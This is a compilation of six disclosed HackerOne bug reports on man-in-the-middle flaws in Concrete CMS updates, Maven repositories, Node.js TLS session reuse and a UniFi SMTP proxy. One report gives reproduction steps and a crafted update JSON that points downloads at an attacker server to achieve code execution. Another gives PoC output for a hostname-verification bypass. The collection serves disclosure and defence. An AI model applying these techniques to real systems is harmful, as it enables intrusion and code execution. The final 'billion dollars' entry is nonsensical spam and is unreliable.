# Man-in-the-Middle

_6 reports — High/Critical, disclosed_

### [Fetching the update json scheme from concrete5 over HTTP leads to remote code execution](https://hackerone.com/reports/982130)

- **Report ID:** `982130`
- **Severity:** High
- **Weakness:** Man-in-the-Middle
- **Program:** Concrete CMS
- **Reporter:** @pabl00nicarres
- **Bounty:** - usd
- **Disclosed:** 2021-09-22T22:19:47.741Z
- **CVE(s):** CVE-2021-40099

**Vulnerability Information:**

Hi,
I noticed that concrete5 fetches the update JSON scheme from www.concrete5.org over HTTP.
The fetched json defines the download URL, so we can simply tamper with this JSON in order to make the update URL point to a server controlled by us.
Combining this with the possibility to set an arbitrary proxy for outgoing communications leads to RCE.

Privileges required: Administrator
Preconditions: the directory "updates" has to be writable from the application. 
Magic word for submitting the report: crayons

Here the steps to reproduce:

- Login with a user with Administrator privileges.
- Set the proxy to an attacker controlled proxy (here I used a Burp instance for the sake of simplicity).
{F987848}
- Write proxy rules to modify both request and answer. With Burp this comes trivial, I used the "match and replace" functionality. 

{F987845}

Here I explain the rules:
The first rule replaces the actual version "8.5.4" with version 8, so we can obtain a response from concrete5 with a valid json to  tamper with.
The second rule changes the json field "Direct Download URL" with an arbitrary host controlled by the attacker.
The third rule changes the json field "version" to a new version, to bypass the internal control logic making the application to believe there's a new update available.
Of course, we could simply provide a crafted json in the response, like this:

```
{"version":"8.6","notes":"RCE","notes_url":"https:\/\/documentation.concrete5.org\/developers\/background\/version-history\/821-release-notes","identifier":"8.6","date":"2017-08-02","direct_download_url":"http:\/\/192.168.1.170:8000\/test.zip"}
```

- Set a webserver with a zipped file. Here I used test.zip, which contains the file "poc.php".
- Perform the update check letting our proxy tamper with request/answer and then click on the download button.
- Verify that our fake update has been downloaded from our rogue server, successfully unzipped and is reachable from the web root (in the example below I downloaded it multiple times).
{F987864}
{F987866}
- The only issue in this procedure is that the application writes the unzipped update in a directory and the name of this directory is generated by the PHP native function time().
{F987869}

It could be easy to guess this value for an attacker but still pretty annoying, iterating over a number of values.
Luckily for us the application token "ccm_token" is generated using the very same "time()" function.
We can just perform an unauthenticated request (or whatever request returns the aforementioned token in a web page) knowing the time function output in that moment.
{F987876}
Doing this, an attacker just needs to perform 2 or 3 requests for nearby time values in order to guess the name of the folder,  making this completely reliable from the attacker perspective.

Thanks
Paolo Serracino

## Impact

Remote Code Execution

---

### [Repositories of datanucleus are fetched over insecure protocol (http insted of https)](https://hackerone.com/reports/879740)

- **Report ID:** `879740`
- **Severity:** High
- **Weakness:** Man-in-the-Middle
- **Program:** Central Security Project
- **Reporter:** @keval_j
- **Bounty:** - usd
- **Disclosed:** 2020-10-05T16:46:01.731Z
- **CVE(s):** -

**Summary (team):**

Maven artifact
groupId: org.datanucleus
artifactId: datanucleus-maven-parent
version: 4.0.0

Vulnerability
the jar files inside repositories are fetched using insecure protocol (http instead of https). This allows these artifacts to be potentially MITMed to maliciously compromise them and infect the build artifacts that are produced. Additionally, if any of these JARs or other dependencies were compromised, any developers or production servers using these could continue to be infected past updating to fix this.

Additional Details
Source File and Line Number: https://search.maven.org/artifact/org.datanucleus/datanucleus-maven-parent/4.0.0/pom (line : 21)
Vulnerable File(s): http://www.datanucleus.org/downloads/maven2/
Vulnerability Introduction: the above mentioned repo is fetched over http and can be exploited by MITM attack.

Steps To Reproduce:
Due to complexity of these bug i avoided to attempt to genereate POC because it could possibly affected existing users. but the detailed POC is in the link below which was the same case back in 2014 please Refer the article to reproduce.
https://medium.com/bugbountywriteup/want-to-take-over-the-java-ecosystem-all-you-need-is-a-mitm-1fc329d898fb
however steps to reproduce are as follows:
Clone the Impacted Project
Change this line in Dilettante so it is targeting the repository used in the build. https://github.com/mveytsman/dilettante/blob/master/dilettante.py#L143
Start Dilettante on your local machine.
Proxy the HTTP traffic for the build through Dilettante
Execute the Build's tests.
You should be greeted with the image of a cat

Patch
Force https insted of http.

In short the jar files in http://www.datanucleus.org/downloads/maven2/ repos are fetched over http which can be intercepted by MITM and could cause severe damage to the existing users.

This isn't just theoretical

A proof of concept for performing this MITM and infecting JAR files on the fly has existed since 2014:
Here's the blog post link:
https://max.computer/blog/how-to-take-over-the-computer-of-any-java-or-clojure-or-scala-developer/
Here's the GitHub repository with the POC code:
https://github.com/mveytsman/dilettante

Impact
By insecurely downloading code over an untrusted connection HTTP and executing the untrusted code inside of these JAR files as part of the unit/integration tests before a release opens these artifacts up to being maliciously compromised.
Remote code execution on a production server. Malicious compromise of build artifacts.

---

### [Node.js: TLS session reuse can lead to hostname verification bypass](https://hackerone.com/reports/811502)

- **Report ID:** `811502`
- **Severity:** High
- **Weakness:** Man-in-the-Middle
- **Program:** Node.js
- **Reporter:** @fwilhelm
- **Bounty:** - usd
- **Disclosed:** 2020-06-03T06:55:54.149Z
- **CVE(s):** CVE-2020-8172

**Vulnerability Information:**

The Node.js TLS library supports client side reuse of TLS sessions when multiple connections to the same server are opened.

Code that wants to use this feature can listen for the 'session' event (https://nodejs.org/api/tls.html#tls_event_session) on a tls.TLSSocket to get notified of newly created TLS sessions. The documentation for this event explicitly mentions that the passed sessions "can be used immediately or later".

The problem with this design is that 'session' events are triggered even if verification of the server certificate hostname in onConnectSecure fails. (https://github.com/nodejs/node/blob/b1d4c13430c92e94920f0c8c9ba1295c075c9e89/lib/_tls_wrap.js#L1502):

onConnectSecure is triggered by the OpenSSL info callback (with the flag SSL_CB_HANDSHAKE_DONE) after a TLS handshake. The 'session' event is triggered by OpenSSLs get_session_cb, which can happen before the info callback in TLS 1.2 and after in TLS 1.3 and which is triggered regardless of the result of onConnectSecure.

This means that sessions where the server presented an invalid certificate, or one with a wrong hostname, will trigger the session event and can end up being reused or stored in a cache.

That behavior is insecure, because resumed sessions will not be subjected to another hostname verification check as long as they are CA signed:

// Verify that server's identity matches it's certificate's names
// Unless server has resumed our existing session
if (!verifyError && !this.isSessionReused()) {
    const hostname = options.servername ||
                   options.host ||
                   (options.socket && options.socket._host) ||
                   'localhost';
    const cert = this.getPeerCertificate(true);
    verifyError = options.checkServerIdentity(hostname, cert);
}


In practice, this means that the immediate reuse described in the API documentation is always insecure and that session caches are at risk of storing insecure sessions. The most important implementation of a session cache is in the https library (https://github.com/nodejs/node/blob/b1d4c13430c92e94920f0c8c9ba1295c075c9e89/lib/https.js#L130): New sessions are stored in the cache when the ‘session’ event is triggered and are evicted once a tls socket is closed with an error. 

 if (options._agentKey) {
    // Cache new session for reuse
    socket.on('session', (session) => {
      this._cacheSession(options._agentKey, session);
    });

    // Evict session on error
    socket.once('close', (err) => {
      if (err)
        this._evictSession(options._agentKey);
    });
  }

This opens a small race window where an invalid session can be used by other HTTPs requests to the same host. The attached proof-of-concept wins the race reliably against a local server using a setImmediate() callback, but there are probably other ways this could be exploited in real world applications. I also did not fully investigate if there is a way to trigger the socket ‘close’ event with no error which would skip the session eviction and turn this into a 100% reliable bypass.


The POC requires a target server with a valid CA signed certificate (for an arbitrary hostname) and support for TLS resumption. I’ve attached a minimal golang https server that worked for me.

[fwilhelm@fwilhelm node]$ ../node/node-v13.9.0-linux-x64/bin/node poc.js
[!] First request failed:Host: nodejs.org. is not in the cert's altnames: DNS:loca.host
[x] Starting second request
[x] Dumping globalAgent._sessionCache.map:
{
  'nodejs.org:8444:::::::::::::::::TLSv1_2_method:': <Buffer 30 82 06 2f 02 01 01 02 02 03 04 04 02 13 01 04 20 cd b7 17 84 ac 9f 31 6f 1c cc 73 de 31 05 eb dc 60 62 df c7 c5 d5 8c b4 75 cc a7 28 1f d9 c0 22 04 ... 1537 more bytes>
}
[!] Bypassed hostname verification. Server response: 200
{
  date: 'Thu, 05 Mar 2020 17:08:24 GMT',
  'content-length': '29',
  'content-type': 'text/plain; charset=utf-8',
  connection: 'close'
}


This bug is subject to a 90 day disclosure deadline. After 90 days elapse,
the bug report will become visible to the public. The scheduled disclosure
date is 2020-06-03. Disclosure at an earlier date is also possible if
agreed upon by all parties.

## Impact

MitM of TLS connections

---

### [Industry-Wide MITM Vulnerability Impacting the JVM Ecosystem](https://hackerone.com/reports/608620)

- **Report ID:** `608620`
- **Severity:** High
- **Weakness:** Man-in-the-Middle
- **Program:** Internet Bug Bounty
- **Reporter:** @jlleitschuh
- **Bounty:** - usd
- **Disclosed:** 2019-09-10T23:33:05.154Z
- **CVE(s):** -

**Vulnerability Information:**

I've been exploring the industry-wide scope of the use of HTTP to resolve dependencies in build infrastructure across the industry. What I unearthed was that some of the most popular libraries and two compilers were impacted by this vulnerability.

## Vulnerability

[CWE-829: Inclusion of Functionality from Untrusted Control Sphere](https://cwe.mitre.org/data/definitions/829.html)
[CWE-494: Download of Code Without Integrity Check](https://cwe.mitre.org/data/definitions/494.html)

The full scope of this vulnerability is captured in my blog post here:
[Want to take over the Java ecosystem? All you need is a MITM!](https://medium.com/@jonathan.leitschuh/want-to-take-over-the-java-ecosystem-all-you-need-is-a-mitm-1fc329d898fb?source=friends_link&sk=3c99970c55a899ad9ef41f126efcde0e)

This vulnerability impacted the following organizations:

 - Apache Foundation (including the Groovy compiler)
 - Eclipse Foundation
 - Pivotal (including many of the Spring projects)
 - RedHat
 - Jenkins
 - JetBrains (including the Kotlin compiler)
 - Gradle
 - PayPal
 - Netflix
 - Twitter
 - PortSwigger
 - Elastic
- Grails

It also impacted some of the most popular JVM libraries including: 
 - TestNG
 - PowerMock
 - Spock
 - Ehcache
 - Hibernate

The list of projects I publicly disclosed the details of this vulnerability to on GitHub during my research can be found here:
https://docs.google.com/spreadsheets/d/1zemxj8QdIp0saqvwJx6Po1KnyEmJXl2KC_0j0SLd_2E/edit?usp=sharing

## Resolution

As a part of resolving this issue, I also reached out to Sonatype (Maven Central), JFrog (JCenter), Pivotal (Spring Source), RedHat and the Eclipse Foundation to make a plea to them to completely block port 80 (HTTP) download of dependencies by 2020.

As a direct result of my research [HTTP access to repo1.maven.org and repo.maven.apache.org is being deprecated](https://central.sonatype.org/articles/2019/Apr/30/http-access-to-repo1mavenorg-and-repomavenapacheorg-is-being-deprecated/). That article will be updated shortly with attribution.

# Criteria
> In addition, vulnerabilities should meet most of the following criteria:

##  Be widespread: vulnerability manifests itself across a wide range of products, or impacts a large number of end users.

This impacted some of the most popular and most used open source projects across the JVM ecosystem.

## Have critical impact: vulnerability has extreme negative consequences for the general public.

Absolutely! This vulnerability impacted the supply chain for incredibly popular JVM libraries and 2 compilers. It was incredibly widespread and if it was exploited could have been used to backdoor applications around the world.

## Be novel: vulnerability is new or unusual in an interesting way.

It's really not novel. That's part of what's sad about this. It's such a simple vulnerability and that it impacted so many projects across the industry was just so disturbing.

# Closing

If you have any questions or want additional information, please don't hesitate to ask. There's more information about the scope of this vulnerability than what I was fully able to capture in the blog post.

## Impact

MITM of dependencies could allow a malicious actor to worm the releases of that artifact so they would infect downstream consumers.

A theoretical example of the worst case of this attack can be found in my addendum titled [Let’s write a (theoretical) Java Library Worm](https://medium.com/@jonathan.leitschuh/lets-write-a-theoretical-java-library-worm-9a6edff87cf5).

Besides that, this could be leveraged to infect developers machines around the world.

---

### [Catch mails sent to an SMTP Server over SSL using an Evil SMTP Server](https://hackerone.com/reports/519582)

- **Report ID:** `519582`
- **Severity:** High
- **Weakness:** Man-in-the-Middle
- **Program:** Ubiquiti Inc.
- **Reporter:** @smartnoob
- **Bounty:** - usd
- **Disclosed:** 2019-08-22T16:34:57.043Z
- **CVE(s):** CVE-2019-5456

**Summary (team):**

A malicious actor setting up an SMTP proxy server between the UniFi Controller and their actual SMTP server can record their SMTP credentials for malicious use.

---

### [[Critical] billion dollars issue](https://hackerone.com/reports/244836)

- **Report ID:** `244836`
- **Severity:** Critical
- **Weakness:** Man-in-the-Middle
- **Program:** Paragon Initiative Enterprises
- **Reporter:** @abdel-fattah-elsisi
- **Bounty:** - usd
- **Disclosed:** 2017-06-30T19:49:59.149Z
- **CVE(s):** -

**Vulnerability Information:**

Hey,

My name is  El-Sisi also i have famous name is بلحه (Balaha) and i have found documents that confirm you the github inc belong to you.

if you need this documents give me reward and i will give u that documents.

why i'm doing this because my mother tell me if you see some things like that you must 
do some things and i did by submit this report.

trust me i have these documents

My achievement in this business(CV):My mother tell me the two islands Tiran and Sanafir not belong to egypt so i heard this words and i help egypt to sell  Tiran and Sanafir islands to Saudi. just for 2 billion dollars 

http://www.al-monitor.com/pulse/originals/2017/06/egypt-tiran-sanafir-island-transfer-saudi-arabia-parliament.html

Thanks my mother without you we will not know this info.

Best,
Balaha

---
